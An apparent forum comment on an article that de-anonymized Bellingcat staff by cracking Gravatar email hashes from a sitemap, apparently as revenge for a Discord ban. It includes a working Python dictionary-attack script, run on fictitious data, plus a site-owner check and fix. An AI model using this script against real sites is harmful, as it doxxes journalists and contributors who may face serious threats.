What I found: 173 Gravatar email hashes sitting in Bellingcat’s public
WordPress sitemap, completely unprotected.
I cracked 89 of those hashes back into the original email addresses.
I pulled 32 full Gravatar profiles containing real names, locations,
social media accounts, and bios.
I scraped all 1,318 published articles for author intelligence
and cross-referenced everything against Gravatar’s public API.
Over half of Bellingcat’s staff and contributors were de-anonymized
from a single sitemap.
Why the author says they did it:
I was kicked from their Discord for posting a gif in an inactive
channel. [Non mod users] lectured me about rules I hadn’t broken,
and within minutes I was banned. The reason logged by their system?
"Discord ToS/Threats."
Bellingcat operates a crossban system that propagates bans across
affiliated OSINT communities. I was automatically banned from
Project Owl: A OSINT Community server I had never interacted with.
Due to our increasingly dead internet, I've become a bit more sympathetic to heavy-handed moderation (in general). Especially if the moderation team is reachable and reasonable. In this article, I see no indication the author reached out to anyone at Bellingcat about his ban.
Further, Bellingcat exists in a space where they push back against some of the most powerful entities on Earth. I assume that brings security nuances I am not aware of.
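The mechanics behind the quoted summary (Gravatar hashes exposed in a sitemap, then reversed by guessing addresses and hashing them), as an added example that is not code from the article or from this comment. Gravatar derives its identifier from the trimmed, lower-cased e-mail address (MD5 historically, SHA-256 also accepted). Everything else here is assumed: the sitemap snippet is constructed, the addresses are fictitious example.org accounts, the local-part naming patterns are a guess at common schemes, and the profile JSON URL is only built, never fetched.

```python
import hashlib
import re

# Gravatar identifies an account by a hash of the trimmed, lower-cased e-mail
# address (MD5 historically; SHA-256 also accepted). Anyone holding the hash
# can request the avatar and, if the profile is public, the profile JSON.
GRAVATAR_RE = re.compile(
    r"gravatar\.com/avatar/([0-9a-f]{64}|[0-9a-f]{32})(?![0-9a-f])", re.I
)


def gravatar_hash(email: str, algo: str = "md5") -> str:
    """Hash an e-mail the way Gravatar does: strip whitespace, lower-case, hash."""
    return hashlib.new(algo, email.strip().lower().encode()).hexdigest()


def extract_hashes(xml_text: str) -> list[str]:
    """Pull every Gravatar hash out of a sitemap (or any page) body."""
    return sorted({m.group(1).lower() for m in GRAVATAR_RE.finditer(xml_text)})


def candidate_emails(names, domains):
    """Generate plausible addresses from (first, last) pairs and domains.

    The local-part patterns are an assumption about common naming schemes.
    """
    for first, last in names:
        f, l = first.lower(), last.lower()
        for domain in domains:
            for local in (f, l, f"{f}.{l}", f"{f}{l}", f"{f[0]}{l}", f"{f}_{l}"):
                yield f"{local}@{domain}"


def crack(hashes, candidates) -> dict[str, str]:
    """Dictionary attack: hash each candidate (MD5 and SHA-256) and look it up."""
    targets = {h.lower() for h in hashes}
    found = {}
    for email in candidates:
        for algo in ("md5", "sha256"):
            h = gravatar_hash(email, algo)
            if h in targets and h not in found:
                found[h] = email
    return found


def profile_json_url(h: str) -> str:
    """Public profile endpoint for a hash (built only; nothing is fetched here)."""
    return f"https://gravatar.com/{h}.json"


# Constructed sample data: fictitious addresses on example.org, not real people.
SAMPLE_EMAILS = ["Alice.Smith@example.org", "bjones@example.org", "nobody@nowhere.invalid"]
SAMPLE_SITEMAP = (
    '<?xml version="1.0"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" '
    'xmlns:image="http://www.google.com/schemas/sitemap-image/1.1">'
    + "".join(
        f"<url><loc>https://example.org/author/{i}/</loc><image:image>"
        f"<image:loc>https://secure.gravatar.com/avatar/{gravatar_hash(e)}?s=96</image:loc>"
        "</image:image></url>"
        for i, e in enumerate(SAMPLE_EMAILS)
    )
    + "</urlset>"
)


def demo():
    """Extract the exposed hashes, then recover the ones a byline-based wordlist hits."""
    hashes = extract_hashes(SAMPLE_SITEMAP)
    names = [("Alice", "Smith"), ("Bob", "Jones")]  # assumed: taken from author bylines
    found = crack(hashes, candidate_emails(names, ["example.org"]))
    return hashes, found


if __name__ == "__main__":
    hashes, found = demo()
    print(f"{len(hashes)} hashes exposed, {len(found)} recovered")
    for h in hashes:
        print(h, "->", found.get(h, "(not in wordlist)"), profile_json_url(h))
```

Run as-is, two of the three constructed hashes are recovered; the third address is not derivable from the name list, which is the same reason real cracking rates stay well below 100%. The same extract_hashes() pass over your own sitemap and author pages is the cheap check for a site owner: if it returns anything, author avatars are leaking a reversible identifier, and the fix is to stop emitting Gravatar URLs for authors (use locally hosted avatars) rather than to rely on the hash.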
WarOnPrivacy•1h ago
Further, Bellingcat exists in a space where they push back against some of the most powerful entities on Earth. I assume that brings security nuances I am not aware of.